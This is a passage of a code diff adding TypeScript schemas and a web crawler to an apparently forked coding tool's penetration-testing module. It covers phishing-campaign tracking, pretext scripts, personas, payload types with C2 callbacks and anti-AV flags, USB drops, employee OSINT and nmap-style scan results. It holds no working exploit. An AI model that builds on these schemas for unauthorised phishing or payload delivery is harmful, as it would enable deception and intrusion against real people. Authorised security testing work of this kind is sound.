+    description: z.string().optional(), // Human-readable description
+    details: z.record(z.string(), z.unknown()).optional(),
+    ipAddress: z.string().optional(),
+    userAgent: z.string().optional(),
+    location: z.string().optional(),
+  })
+  export type TimelineEvent = z.infer<typeof TimelineEventSchema>
+
+  /**
+   * Captured credential schema (hashed for security).
+   */
+  export const CapturedCredentialSchema = z.object({
+    id: z.string(),
+    campaignId: z.string(),
+    targetId: z.string(),
+    fields: z.record(z.string(), z.string()), // field name -> hashed value
+    timestamp: z.number(),
+    ipAddress: z.string().optional(),
+  })
+  export type CapturedCredential = z.infer<typeof CapturedCredentialSchema>
+
+  /**
+   * Campaign results schema.
+   */
+  export const CampaignResultsSchema = z.object({
+    campaignId: z.string(),
+    totalTargets: z.number(),
+    emailsSent: z.number(),
+    emailsDelivered: z.number(),
+    emailsBounced: z.number(),
+    emailsOpened: z.number(),
+    uniqueOpens: z.number(),
+    linksClicked: z.number(),
+    uniqueClicks: z.number(),
+    attachmentsOpened: z.number(),
+    credentialsCaptured: z.number(),
+    formsSubmitted: z.number(),
+    payloadsExecuted: z.number(),
+    reportedAsPhish: z.number(),
+    trainingCompleted: z.number(),
+    timeline: z.array(TimelineEventSchema),
+    startTime: z.number().optional(),
+    endTime: z.number().optional(),
+  })
+  export type CampaignResults = z.infer<typeof CampaignResultsSchema>
+
+  // ========== Pretext Types ==========
+
+  /**
+   * Pretext category.
+   */
+  export const PretextCategorySchema = z.enum([
+    "it-support",
+    "hr",
+    "executive",
+    "vendor",
+    "delivery",
+    "banking",
+    "government",
+    "technical",
+    "social",
+    "custom",
+  ])
+  export type PretextCategory = z.infer<typeof PretextCategorySchema>
+
+  /**
+   * Script section schema.
+   */
+  export const ScriptSectionSchema = z.object({
+    phase: z.string(),
+    objective: z.string(),
+    dialogue: z.array(z.string()),
+    notes: z.array(z.string()).optional(),
+    transitions: z.array(z.string()).optional(),
+  })
+  export type ScriptSection = z.infer<typeof ScriptSectionSchema>
+
+  /**
+   * Rebuttal schema.
+   */
+  export const RebuttalSchema = z.object({
+    objection: z.string(),
+    response: z.string(),
+    escalation: z.string().optional(),
+  })
+  export type Rebuttal = z.infer<typeof RebuttalSchema>
+
+  /**
+   * Pretext scenario schema.
+   */
+  export const PretextScenarioSchema = z.object({
+    id: z.string(),
+    name: z.string(),
+    category: PretextCategorySchema,
+    description: z.string(),
+    difficulty: z.enum(["easy", "medium", "hard"]),
+    objectives: z.array(z.string()),
+    prerequisites: z.array(z.string()),
+    script: z.array(ScriptSectionSchema),
+    rebuttals: z.array(RebuttalSchema),
+    redFlags: z.array(z.string()),
+    successIndicators: z.array(z.string()),
+    legalConsiderations: z.array(z.string()),
+  })
+  export type PretextScenario = z.infer<typeof PretextScenarioSchema>
+
+  /**
+   * Persona schema.
+   */
+  export const PersonaSchema = z.object({
+    id: z.string(),
+    name: z.string(),
+    role: z.string(),
+    company: z.string(),
+    email: z.string(),
+    phone: z.string().optional(),
+    department: z.string().optional(),
+    backstory: z.string(),
+    speakingStyle: z.string(),
+    knowledgeBase: z.array(z.string()),
+    verificationDetails: z.record(z.string(), z.string()).optional(),
+  })
+  export type Persona = z.infer<typeof PersonaSchema>
+
+  // ========== Payload Types ==========
+
+  /**
+   * Payload type.
+   */
+  export const PayloadTypeSchema = z.enum([
+    "document",
+    "executable",
+    "macro",
+    "hta",
+    "lnk",
+    "usb",
+    "qr-code",
+    "badge-clone",
+  ])
+  export type PayloadType = z.infer<typeof PayloadTypeSchema>
+
+  /**
+   * Payload schema.
+   */
+  export const PayloadSchema = z.object({
+    id: z.string(),
+    name: z.string(),
+    type: PayloadTypeSchema,
+    description: z.string(),
+    filename: z.string().optional(),
+    extension: z.string().optional(),
+    callback: z.string().optional(), // C2 callback URL
+    obfuscation: z.boolean(),
+    antiSandbox: z.boolean(),
+    antiAV: z.boolean(),
+    template: z.string().optional(),
+    createdAt: z.number(),
+  })
+  export type Payload = z.infer<typeof PayloadSchema>
+
+  /**
+   * USB drop payload schema.
+   */
+  export const USBPayloadSchema = z.object({
+    id: z.string(),
+    name: z.string(),
+    files: z.array(z.object({
+      name: z.string(),
+      type: z.string(),
+      purpose: z.string(),
+    })),
+    autorun: z.boolean(),
+    callback: z.string().optional(),
+    labelText: z.string().optional(), // Text on USB label
+  })
+  export type USBPayload = z.infer<typeof USBPayloadSchema>
+
+  // ========== OSINT Types ==========
+
+  /**
+   * Employee schema.
+   */
+  export const EmployeeSchema = z.object({
+    name: z.string(),
+    title: z.string().optional(),
+    department: z.string().optional(),
+    email: z.string().optional(),
+    phone: z.string().optional(),
+    linkedin: z.string().optional(),
+    source: z.string(),
+  })
+  export type Employee = z.infer<typeof EmployeeSchema>
+
+  /**
+   * Social profile schema.
+   */
+  export const SocialProfileSchema = z.object({
+    platform: z.string(),
+    username: z.string(),
+    url: z.string(),
+    name: z.string().optional(),
+    bio: z.string().optional(),
+    followers: z.number().optional(),
+    posts: z.number().optional(),
+  })
+  export type SocialProfile = z.infer<typeof SocialProfileSchema>
+
+  /**
+   * Document metadata schema.
+   */
+  export const DocumentMetadataSchema = z.object({
+    filename: z.string(),
+    url: z.string(),
+    author: z.string().optional(),
+    creator: z.string().optional(),
+    createdDate: z.string().optional(),
+    modifiedDate: z.string().optional(),
+    software: z.string().optional(),
+    company: z.string().optional(),
+    emails: z.array(z.string()).optional(),
+    usernames: z.array(z.string()).optional(),
+  })
+  export type DocumentMetadata = z.infer<typeof DocumentMetadataSchema>
+
+  /**
+   * OSINT result schema.
+   */
+  export const OSINTResultSchema = z.object({
+    id: z.string(),
+    target: z.string(),
+    targetType: z.enum(["domain", "company", "person", "email"]),
+    emails: z.array(z.string()),
+    employees: z.array(EmployeeSchema),
+    socialProfiles: z.array(SocialProfileSchema),
+    subdomains: z.array(z.string()),
+    technologies: z.array(z.string()),
+    documents: z.array(DocumentMetadataSchema),
+    breaches: z.array(z.object({
+      name: z.string(),
+      date: z.string(),
+      dataTypes: z.array(z.string()),
+    })),
+    timestamp: z.number(),
+  })
+  export type OSINTResult = z.infer<typeof OSINTResultSchema>
+
+  // ========== Email Security Types ==========
+
+  /**
+   * SPF record result.
+   */
+  export const SPFResultSchema = z.object({
+    exists: z.boolean(),
+    record: z.string().optional(),
+    valid: z.boolean(),
+    mechanisms: z.array(z.string()),
+    includes: z.array(z.string()),
+    allMechanism: z.string().optional(),
+    issues: z.array(z.string()),
+  })
+  export type SPFResult = z.infer<typeof SPFResultSchema>
+
+  /**
+   * DKIM record result.
+   */
+  export const DKIMResultSchema = z.object({
+    exists: z.boolean(),
+    selectors: z.array(z.object({
+      selector: z.string(),
+      record: z.string().optional(),
+      valid: z.boolean(),
+      keyType: z.string().optional(),
+      keySize: z.number().optional(),
+    })),
+    issues: z.array(z.string()),
+  })
+  export type DKIMResult = z.infer<typeof DKIMResultSchema>
+
+  /**
+   * DMARC record result.
+   */
+  export const DMARCResultSchema = z.object({
+    exists: z.boolean(),
+    record: z.string().optional(),
+    valid: z.boolean(),
+    policy: z.string().optional(),
+    subdomainPolicy: z.string().optional(),
+    percentage: z.number().optional(),
+    reportingUris: z.array(z.string()),
+    issues: z.array(z.string()),
+  })
+  export type DMARCResult = z.infer<typeof DMARCResultSchema>
+
+  /**
+   * Email security assessment.
+   */
+  export const EmailSecurityAssessmentSchema = z.object({
+    domain: z.string(),
+    spf: SPFResultSchema,
+    dkim: DKIMResultSchema,
+    dmarc: DMARCResultSchema,
+    mxRecords: z.array(z.string()),
+    spoofable: z.boolean(),
+    spoofDifficulty: z.enum(["trivial", "easy", "moderate", "difficult", "very_difficult"]),
+    recommendations: z.array(z.string()),
+    timestamp: z.number(),
+  })
+  export type EmailSecurityAssessment = z.infer<typeof EmailSecurityAssessmentSchema>
+
+  // ========== Awareness Types ==========
+
+  /**
+   * Awareness metrics schema.
+   */
+  export const AwarenessMetricsSchema = z.object({
+    organizationId: z.string(),
+    period: z.object({
+      start: z.number(),
+      end: z.number(),
+    }),
+    totalCampaigns: z.number(),
+    totalTargets: z.number(),
+    clickRate: z.number(),
+    submitRate: z.number(),
+    reportRate: z.number(),
+    averageTimeToClick: z.number(),
+    averageTimeToReport: z.number(),
+    riskScore: z.number(),
+    trendDirection: z.enum(["improving", "stable", "declining"]),
+    departmentBreakdown: z.array(z.object({
+      department: z.string(),
+      clickRate: z.number(),
+      submitRate: z.number(),
+      reportRate: z.number(),
+    })),
+  })
+  export type AwarenessMetrics = z.infer<typeof AwarenessMetricsSchema>
+
+  // ========== Profile Types ==========
+
+  /**
+   * Campaign profile schema.
+   */
+  export const CampaignProfileSchema = z.object({
+    name: z.string(),
+    description: z.string(),
+    campaignType: CampaignTypeSchema,
+    difficulty: z.enum(["basic", "intermediate", "advanced"]),
+    templateCategory: z.string(),
+    tracking: TrackingConfigSchema,
+    includeAwareness: z.boolean(),
+    recommended: z.boolean(),
+  })
+  export type CampaignProfile = z.infer<typeof CampaignProfileSchema>
+
+  // ========== Severity ==========
+
+  export type Severity = "critical" | "high" | "medium" | "low" | "info"
+
+  // ========== Additional OSINT/Pretext Types ==========
+
+  /**
+   * OSINT record schema (for storage/retrieval).
+   */
+  export const OSINTSchema = z.object({
+    id: z.string(),
+    targetId: z.string(),
+    type: z.string(),
+    source: z.string(),
+    data: z.record(z.string(), z.unknown()),
+    timestamp: z.number().optional(),
+    verified: z.boolean().optional(),
+    confidence: z.enum(["low", "medium", "high"]).optional(),
+  })
+  export type OSINT = z.infer<typeof OSINTSchema>
+
+  /**
+   * Pretext schema (for storage/retrieval).
+   */
+  export const PretextSchema = z.object({
+    id: z.string(),
+    name: z.string(),
+    category: z.string(),
+    description: z.string(),
+    script: z.string(),
+    objectives: z.array(z.string()),
+    requiredInfo: z.array(z.string()).optional(),
+    persona: z.string().optional(),
+    createdAt: z.number(),
+  })
+  export type Pretext = z.infer<typeof PretextSchema>
+}
diff --git a/packages/opencode/src/pentest/types.ts b/packages/opencode/src/pentest/types.ts
new file mode 100644
index 00000000000..3c8994eb341
--- /dev/null
+++ b/packages/opencode/src/pentest/types.ts
@@ -0,0 +1,190 @@
+/**
+ * @fileoverview Pentest Module Types
+ *
+ * Defines core types for the penetration testing module including
+ * scan results, findings, and vulnerability classifications.
+ *
+ * @module pentest/types
+ */
+
+import z from "zod"
+import { BusEvent } from "../bus/bus-event"
+
+export namespace PentestTypes {
+  /**
+   * Severity levels for security findings.
+   * Based on CVSS scoring ranges.
+   */
+  export const Severity = z.enum(["critical", "high", "medium", "low", "info"])
+  export type Severity = z.infer<typeof Severity>
+
+  /**
+   * Status of a finding through its lifecycle.
+   */
+  export const FindingStatus = z.enum(["open", "confirmed", "mitigated", "false_positive"])
+  export type FindingStatus = z.infer<typeof FindingStatus>
+
+  /**
+   * Types of security scans supported.
+   */
+  export const ScanType = z.enum(["port", "service", "vuln", "web", "custom"])
+  export type ScanType = z.infer<typeof ScanType>
+
+  /**
+   * Port state from nmap scans.
+   */
+  export const PortState = z.enum(["open", "closed", "filtered", "unfiltered", "open|filtered", "closed|filtered"])
+  export type PortState = z.infer<typeof PortState>
+
+  /**
+   * Protocol type for ports.
+   */
+  export const Protocol = z.enum(["tcp", "udp", "sctp"])
+  export type Protocol = z.infer<typeof Protocol>
+
+  /**
+   * Service information detected on a port.
+   */
+  export const Service = z.object({
+    name: z.string(),
+    product: z.string().optional(),
+    version: z.string().optional(),
+    extrainfo: z.string().optional(),
+    ostype: z.string().optional(),
+    method: z.string().optional(),
+    conf: z.number().optional(),
+  })
+  export type Service = z.infer<typeof Service>
+
+  /**
+   * Individual port scan result.
+   */
+  export const Port = z.object({
+    protocol: Protocol,
+    portid: z.number(),
+    state: PortState,
+    reason: z.string().optional(),
+    service: Service.optional(),
+  })
+  export type Port = z.infer<typeof Port>
+
+  /**
+   * OS detection result.
+   */
+  export const OSMatch = z.object({
+    name: z.string(),
+    accuracy: z.number(),
+    family: z.string().optional(),
+    vendor: z.string().optional(),
+  })
+  export type OSMatch = z.infer<typeof OSMatch>
+
+  /**
+   * Host information from a scan.
+   */
+  export const Host = z.object({
+    address: z.string(),
+    addressType: z.enum(["ipv4", "ipv6", "mac"]).default("ipv4"),
+    hostname: z.string().optional(),
+    status: z.enum(["up", "down", "unknown"]),
+    ports: z.array(Port),
+    os: z.array(OSMatch).optional(),
+    startTime: z.number().optional(),
+    endTime: z.number().optional(),
+  })
+  export type Host = z.infer<typeof Host>
+
+  /**
+   * Complete scan result.
+   */
+  export const ScanResult = z.object({
+    id: z.string(),
+    sessionID: z.string(),
+    scanType: ScanType,
+    target: z.string(),
+    command: z.string(),
+    startTime: z.number(),
+    endTime: z.number().optional(),
+    hosts: z.array(Host),
+    rawOutput: z.string().optional(),
+    xmlOutput: z.string().optional(),
+    summary: z.string().optional(),
+  })
+  export type ScanResult = z.infer<typeof ScanResult>
+
+  /**
+   * Security finding from analysis.
+   */
+  export const Finding = z.object({
+    id: z.string(),
+    sessionID: z.string(),
+    scanID: z.string().optional(),
+    title: z.string(),
+    description: z.string(),
+    severity: Severity,
+    status: FindingStatus,
+    target: z.string(),
+    port: z.number().optional(),
+    protocol: Protocol.optional(),
+    service: z.string().optional(),
+    evidence: z.string().optional(),
+    remediation: z.string().optional(),
+    references: z.array(z.string()).optional(),
+    cve: z.array(z.string()).optional(),
+    createdAt: z.number(),
+    updatedAt: z.number().optional(),
+  })
+  export type Finding = z.infer<typeof Finding>
+
+  /**
+   * Pentest session configuration.
+   */
+  export const SessionConfig = z.object({
+    scope: z.object({
+      targets: z.array(z.string()),
+      excludeTargets: z.array(z.string()).optional(),
+      ports: z.string().optional(), // e.g., "1-1000", "22,80,443"
+    }),
+    options: z.object({
+      timing: z.number().min(0).max(5).default(3), // nmap timing template
+      aggressive: z.boolean().default(false),
+      serviceDetection: z.boolean().default(true),
+      osDetection: z.boolean().default(false),
+      scriptScan: z.boolean().default(false),
+    }).optional(),
+  })
+  export type SessionConfig = z.infer<typeof SessionConfig>
+
+  /**
+   * Bus events for pentest module.
+   */
+  export const Event = {
+    ScanStarted: BusEvent.define(
+      "pentest.scan_started",
+      z.object({
+        scanID: z.string(),
+        tool: z.string().optional(),
+        target: z.string(),
+        command: z.string(),
+      })
+    ),
+    ScanCompleted: BusEvent.define(
+      "pentest.scan_completed",
+      z.object({
+        scan: ScanResult,
+      })
+    ),
+    FindingCreated: BusEvent.define(
+      "pentest.finding_created",
+      z.object({
+        finding: Finding,
+      })
+    ),
+    FindingUpdated: BusEvent.define(
+      "pentest.finding_updated",
+      z.object({
+        finding: Finding,
+      })
+    ),
+  }
+}
diff --git a/packages/opencode/src/pentest/webscan/crawler.ts b/packages/opencode/src/pentest/webscan/crawler.ts
new file mode 100644
index 00000000000..2ab885e698e
--- /dev/null
+++ b/packages/opencode/src/pentest/webscan/crawler.ts
@@ -0,0 +1,520 @@
+/**
+ * @fileoverview Web Crawler
+ *
+ * A lightweight web crawler using native fetch() with regex-based
+ * link and form extraction. No external DOM library required.
+ *
+ * @module pentest/webscan/crawler
+ */
+
+import { WebScanTypes } from "./types"
+import { WebScanEvents } from "./events"
+import { Bus } from "../../bus"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "webscan.crawler" })
+
+/**
+ * Web crawler namespace.
+ */
+export namespace WebCrawler {
+  // Regex patterns for extraction
+  const HREF_REGEX = /href=["']([^"'#]+)["']/gi
+  const SRC_REGEX = /src=["']([^"']+)["']/gi
+  const FORM_REGEX = /<form[^>]*>([\s\S]*?)<\/form>/gi
+  const FORM_ACTION_REGEX = /action=["']([^"']*)["']/i
+  const FORM_METHOD_REGEX = /method=["']([^"']*)["']/i
+  const INPUT_REGEX = /<input[^>]*>/gi
+  const TEXTAREA_REGEX = /<textarea[^>]*name=["']([^"']*)["'][^>]*>/gi
+  const SELECT_REGEX = /<select[^>]*name=["']([^"']*)["'][^>]*>/gi
+  const INPUT_NAME_REGEX = /name=["']([^"']*)["']/i
+  const INPUT_TYPE_REGEX = /type=["']([^"']*)["']/i
+  const INPUT_VALUE_REGEX = /value=["']([^"']*)["']/i
+  const INPUT_REQUIRED_REGEX = /required(?:=["'](?:true|required)["'])?/i
+
+  /**
+   * Normalize URL relative to base.
+   */
+  function normalizeUrl(href: string, baseUrl: string): string | null {
+    try {
+      // Skip non-http links
+      if (
+        href.startsWith("javascript:") ||
+        href.startsWith("mailto:") ||
+        href.startsWith("tel:") ||
+        href.startsWith("data:") ||
+        href.startsWith("#")
+      ) {
+        return null
+      }
+
+      const base = new URL(baseUrl)
+      const url = new URL(href, baseUrl)
+
+      // Only allow same origin
+      if (url.origin !== base.origin) {
+        return null
+      }
+
+      // Remove hash
+      url.hash = ""
+
+      return url.href
+    } catch {
+      return null
+    }
+  }
+
+  /**
+   * Extract links from HTML content.
+   */
+  export function extractLinks(html: string, baseUrl: string): string[] {
+    const links = new Set<string>()
+
+    // Extract href attributes
+    let match
+    while ((match = HREF_REGEX.exec(html)) !== null) {
+      const url = normalizeUrl(match[1], baseUrl)
+      if (url) links.add(url)
+    }
+
+    // Reset regex
+    HREF_REGEX.lastIndex = 0
+
+    // Extract src attributes (for scripts/images that might reveal endpoints)
+    while ((match = SRC_REGEX.exec(html)) !== null) {
+      const url = normalizeUrl(match[1], baseUrl)
+      if (url && !url.match(/\.(png|jpg|jpeg|gif|svg|ico|css|woff|woff2|ttf|eot)$/i)) {
+        links.add(url)
+      }
+    }
+
+    SRC_REGEX.lastIndex = 0
+
+    return Array.from(links)
+  }
+
+  /**
+   * Parse form input type.
+   */
+  function parseInputType(typeStr: string): WebScanTypes.InputType {
+    const normalized = typeStr.toLowerCase()
+    const validTypes: WebScanTypes.InputType[] = [
+      "text",
+      "password",
+      "email",
+      "number",
+      "hidden",
+      "submit",
+      "checkbox",
+      "radio",
+      "file",
+      "textarea",
+      "select",
+    ]
+    return validTypes.includes(normalized as WebScanTypes.InputType)
+      ? (normalized as WebScanTypes.InputType)
+      : "other"
+  }
+
+  /**
+   * Extract forms from HTML content.
+   */
+  export function extractForms(html: string, pageUrl: string): WebScanTypes.DiscoveredForm[] {
+    const forms: WebScanTypes.DiscoveredForm[] = []
+
+    let formMatch
+    while ((formMatch = FORM_REGEX.exec(html)) !== null) {
+      const formHtml = formMatch[0]
+      const formContent = formMatch[1]
+
+      // Extract action
+      const actionMatch = FORM_ACTION_REGEX.exec(formHtml)
+      const actionRaw = actionMatch ? actionMatch[1] : ""
+      const action = normalizeUrl(actionRaw, pageUrl) || pageUrl
+
+      // Extract method
+      const methodMatch = FORM_METHOD_REGEX.exec(formHtml)
+      const methodRaw = methodMatch ? methodMatch[1].toUpperCase() : "GET"
+      const method = methodRaw === "POST" ? "POST" : "GET"
+
+      // Extract inputs
+      const inputs: WebScanTypes.FormInput[] = []
+      let hasFileUpload = false
+      let hasPassword = false
+
+      // Parse <input> elements
+      let inputMatch
+      while ((inputMatch = INPUT_REGEX.exec(formContent)) !== null) {
+        const inputHtml = inputMatch[0]
+
+        const nameMatch = INPUT_NAME_REGEX.exec(inputHtml)
+        const typeMatch = INPUT_TYPE_REGEX.exec(inputHtml)
+        const valueMatch = INPUT_VALUE_REGEX.exec(inputHtml)
+        const required = INPUT_REQUIRED_REGEX.test(inputHtml)
+
+        const name = nameMatch ? nameMatch[1] : ""
+        const typeRaw = typeMatch ? typeMatch[1] : "text"
+        const type = parseInputType(typeRaw)
+        const value = valueMatch ? valueMatch[1] : undefined
+
+        if (name) {
+          inputs.push({ name, type, value, required })
+        }
+
+        if (type === "file") hasFileUpload = true
+        if (type === "password") hasPassword = true
+      }
+      INPUT_REGEX.lastIndex = 0
+
+      // Parse <textarea> elements
+      let textareaMatch
+      while ((textareaMatch = TEXTAREA_REGEX.exec(formContent)) !== null) {
+        inputs.push({
+          name: textareaMatch[1],
+          type: "textarea",
+          required: false,
+        })
+      }
+      TEXTAREA_REGEX.lastIndex = 0
+
+      // Parse <select> elements
+      let selectMatch
+      while ((selectMatch = SELECT_REGEX.exec(formContent)) !== null) {
+        inputs.push({
+          name: selectMatch[1],
+          type: "select",
+          required: false,
+        })
+      }
+      SELECT_REGEX.lastIndex = 0
+
+      forms.push({
+        id: `form_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+        url: pageUrl,
+        action,
+        method: method as "GET" | "POST",
+        inputs,
+        hasFileUpload,
+        hasPassword,
+        discoveredAt: Date.now(),
+      })
+    }
+
+    FORM_REGEX.lastIndex = 0
+
+    return forms
+  }
+
+  /**
+   * Fetch a URL with timeout and error handling.
+   */
+  async function fetchPage(
+    url: string,
+    options: WebScanTypes.CrawlOptions,
+    signal?: AbortSignal
+  ): Promise<{ html: string; statusCode: number; contentType: string } | null> {
+    try {
+      const headers: Record<string, string> = {
+        Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+      }
+
+      if (options.userAgent) {
+        headers["User-Agent"] = options.userAgent
+      }
+
+      const response = await fetch(url, {
+        method: "GET",
+        headers,
+        redirect: options.followRedirects ? "follow" : "manual",
+        signal,
+      })
+
+      const contentType = response.headers.get("content-type") || ""
+
+      // Only process HTML
+      if (!contentType.includes("text/html") && !contentType.includes("application/xhtml")) {
+        return {
+          html: "",
+          statusCode: response.status,
+          contentType,
+        }
+      }
+
+      const html = await response.text()
+
+      return {
+        html,
+        statusCode: response.status,
+        contentType,
+      }
+    } catch (error) {
+      if (error instanceof Error && error.name === "AbortError") {
+        throw error
+      }
+      log.warn("fetch failed", { url, error: String(error) })
+      return null
+    }
+  }
+
+  /**
+   * Check robots.txt for crawl permissions.
+   */
+  async function checkRobotsTxt(baseUrl: string, userAgent: string): Promise<string[]> {
+    try {
+      const robotsUrl = new URL("/robots.txt", baseUrl).href
+      const response = await fetch(robotsUrl)
+
+      if (!response.ok) return []
+
+      const text = await response.text()
+      const disallowed: string[] = []
+
+      let relevantSection = false
+      for (const line of text.split("\n")) {
+        const trimmed = line.trim().toLowerCase()
+
+        if (trimmed.startsWith("user-agent:")) {
+          const agent = trimmed.slice(11).trim()
+          relevantSection = agent === "*" || userAgent.toLowerCase().includes(agent)
+        } else if (relevantSection && trimmed.startsWith("disallow:")) {
+          const path = trimmed.slice(9).trim()
+          if (path) disallowed.push(path)
+        }
+      }
+
+      return disallowed
+    } catch {
+      return []
+    }
+  }
+
+  /**
+   * Check if URL is allowed by robots.txt.
+   */
+  function isAllowedByRobots(url: string, disallowed: string[]): boolean {
+    try {
+      const path = new URL(url).pathname
+      return !disallowed.some((pattern) => {
+        if (pattern.endsWith("*")) {
+          return path.startsWith(pattern.slice(0, -1))
+        }
+        return path === pattern || path.startsWith(pattern + "/")
+      })
+    } catch {
+      return true
+    }
+  }
+
+  /**
+   * Crawl a target URL.
+   */
+  export async function crawl(
+    target: string,
+    options: Partial<WebScanTypes.CrawlOptions> = {},
+    signal?: AbortSignal
+  ): Promise<WebScanTypes.CrawlResult> {
+    const crawlOptions = WebScanTypes.CrawlOptions.parse(options)
+    const crawlID = `crawl_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`
+    const startedAt = Date.now()
+
+    log.info("crawl started", { crawlID, target, options: crawlOptions })
+
+    Bus.publish(WebScanEvents.CrawlStarted, {
+      crawlID,
+      target,
+      maxDepth: crawlOptions.maxDepth,
+      maxUrls: crawlOptions.maxUrls,
+    })
+
+    const urls: WebScanTypes.DiscoveredUrl[] = []
+    const forms: WebScanTypes.DiscoveredForm[] = []
+    const visited = new Set<string>()
+    const queue: Array<{ url: string; depth: number; parent?: string }> = [{ url: target, depth: 0 }]
+    let errorCount = 0
+    let maxDepthReached = 0
+
+    // Check robots.txt if enabled
+    const disallowed = crawlOptions.respectRobotsTxt
+      ? await checkRobotsTxt(target, crawlOptions.userAgent || "cyxwiz-crawler")
+      : []
+
+    try {
+      while (queue.length > 0 && urls.length < crawlOptions.maxUrls) {
+        // Check abort signal
+        if (signal?.aborted) {
+          log.info("crawl aborted", { crawlID })
+          break
+        }
+
+        const item = queue.shift()!
+
+        // Skip if already visited
+        if (visited.has(item.url)) continue
+        visited.add(item.url)
+
+        // Skip if disallowed by robots.txt
+        if (crawlOptions.respectRobotsTxt && !isAllowedByRobots(item.url, disallowed)) {
+          continue
+        }
+
+        // Check include/exclude patterns
+        if (crawlOptions.excludePatterns) {
+          const excluded = crawlOptions.excludePatterns.some((p) => new RegExp(p).test(item.url))
+          if (excluded) continue
+        }
+
+        if (crawlOptions.includePatterns && crawlOptions.includePatterns.length > 0) {
+          const included = crawlOptions.includePatterns.some((p) => new RegExp(p).test(item.url))
+          if (!included) continue
+        }
+
+        // Add delay between requests
+        if (urls.length > 0 && crawlOptions.delay > 0) {
+          await new Promise((resolve) => setTimeout(resolve, crawlOptions.delay))
+        }
+
+        // Fetch page with timeout
+        const controller = new AbortController()
+        const timeout = setTimeout(() => controller.abort(), crawlOptions.timeout)
+
+        try {
+          const result = await fetchPage(item.url, crawlOptions, controller.signal)
+          clearTimeout(timeout)
+
+          if (!result) {
+            errorCount++
+            continue
+          }
+
+          // Record URL
+          const discoveredUrl: WebScanTypes.DiscoveredUrl = {
+            url: item.url,
+            method: "GET",
+            statusCode: result.statusCode,
+            contentType: result.contentType,
+            depth: item.depth,
+            parent: item.parent,
+            discoveredAt: Date.now(),
+          }
+          urls.push(discoveredUrl)
+          maxDepthReached = Math.max(maxDepthReached, item.depth)
+
+          Bus.publish(WebScanEvents.UrlDiscovered, {
+            crawlID,
+            url: item.url,
+            depth: item.depth,
+            statusCode: result.statusCode,
+          })
+
+          // Extract and process content if we got HTML
+          if (result.html && item.depth < crawlOptions.maxDepth) {
+            // Extract links
+            const links = extractLinks(result.html, item.url)
+            for (const link of links) {
+              if (!visited.has(link)) {
+                queue.push({ url: link, depth: item.depth + 1, parent: item.url })
+              }
+            }
+
+            // Extract forms
+            const pageForms = extractForms(result.html, item.url)
+            for (const form of pageForms) {
+              forms.push(form)
+
+              Bus.publish(WebScanEvents.FormDiscovered, {
+                crawlID,
+                formID: form.id,
+                url: form.url,
+                action: form.action,
+                inputCount: form.inputs.length,
+                hasPassword: form.hasPassword,
+              })
+            }
+          }
+        } catch (error) {
+          clearTimeout(timeout)
+          if (error instanceof Error && error.name === "AbortError") {
+            errorCount++
+          } else {
+            throw error
+          }
+        }
+      }
+    } catch (error) {
+      log.error("crawl error", { crawlID, error: String(error) })
+
+      const duration = Date.now() - startedAt
+      const result: WebScanTypes.CrawlResult = {
+        id: crawlID,
+        target,
+        urls,
+        forms,
+        stats: {
+          urlsDiscovered: urls.length,
+          urlsVisited: visited.size,
+          formsDiscovered: forms.length,
+          maxDepthReached,
+          errorCount,
+          duration,
+        },
+        options: crawlOptions,
+        startedAt,
+        completedAt: Date.now(),
+        status: "failed",
+        error: String(error),
+      }
+
+      Bus.publish(WebScanEvents.CrawlCompleted, {
+        crawlID,
+        target,
+        urlsDiscovered: urls.length,
+        formsDiscovered: forms.length,
+        duration,
+        status: "failed",
+      })
+
+      return result
+    }
+
+    const duration = Date.now() - startedAt
+    const status = signal?.aborted ? "stopped" : "completed"
+
+    log.info("crawl completed", {
+      crawlID,
+      urlsDiscovered: urls.length,
+      formsDiscovered: forms.length,
+      duration,
+    })
+
+    const result: WebScanTypes.CrawlResult = {
+      id: crawlID,
+      target,
+      urls,
+      forms,
+      stats: {
+        urlsDiscovered: urls.length,
+        urlsVisited: visited.size,
+        formsDiscovered: forms.length,
+        maxDepthReached,
+        errorCount,
+        duration,
+      },
+      options: crawlOptions,
+      startedAt,
+      completedAt: Date.now(),
+      status,
+    }
+
+    Bus.publish(WebScanEvents.CrawlCompleted, {
+      crawlID,
+      target,
+      urlsDiscovered: urls.length,
+      formsDiscovered: forms.length,
+      duration,
+      status,
+    })
+
+    return result
+  }
+}
diff --git a/packages/opencode/src/pentest/webscan/events.ts b/packages/opencode/src/pentest/webscan/events.ts
new file mode 100644
index 00000000000..5e4b4674a4e
--- /dev/null
+++ b/packages/opencode/src/pentest/webscan/events.ts
@@ -0,0 +1,138 @@
+/**
+ * @fileoverview Web Scanner Events
+ *
+ * Bus event definitions for web scanning operations.
+ *
+ * @module pentest/webscan/events
+ */
+
+import z from "zod"
+import { BusEvent } from "../../bus/bus-event"
+
+/**
+ * Web scanner events namespace.
+ */
+export namespace WebScanEvents {
+  /**
+   * Crawl started.
+   */
+  export const CrawlStarted = BusEvent.define(
+    "pentest.webscan.crawl_started",
+    z.object({
+      crawlID: z.string(),
+      target: z.string(),
+      maxDepth: z.number(),
+      maxUrls: z.number(),
+    })
+  )
+
+  /**
+   * URL discovered during crawl.
+   */
+  export const UrlDiscovered = BusEvent.define(
+    "pentest.webscan.url_discovered",
+    z.object({
+      crawlID: z.string(),
+      url: z.string(),
+      depth: z.number(),
+      statusCode: z.number().optional(),
+    })
+  )
+
+  /**
+   * Form discovered during crawl.
+   */
+  export const FormDiscovered = BusEvent.define(
+    "pentest.webscan.form_discovered",
+    z.object({
+      crawlID: z.string(),
+      formID: z.string(),
+      url: z.string(),
+      action: z.string(),
+      inputCount: z.number(),
+      hasPassword: z.boolean(),
+    })
+  )
+
+  /**
+   * Crawl completed.
+   */
+  export const CrawlCompleted = BusEvent.define(
+    "pentest.webscan.crawl_completed",
+    z.object({
+      crawlID: z.string(),
+      target: z.string(),
+      urlsDiscovered: z.number(),
+      formsDiscovered: z.number(),
+      duration: z.number(),
+      status: z.enum(["completed", "failed", "stopped"]),
+    })
+  )
+
+  /**
+   * Scan started.
+   */
+  export const ScanStarted = BusEvent.define(
+    "pentest.webscan.scan_started",
+    z.object({
+      scanID: z.string(),
+      target: z.string(),
+      profile: z.string(),
+      tools: z.array(z.string()),
+    })
+  )
+
+  /**
+   * Tool execution started.
+   */
+  export const ToolStarted = BusEvent.define(
+    "pentest.webscan.tool_started",
+    z.object({
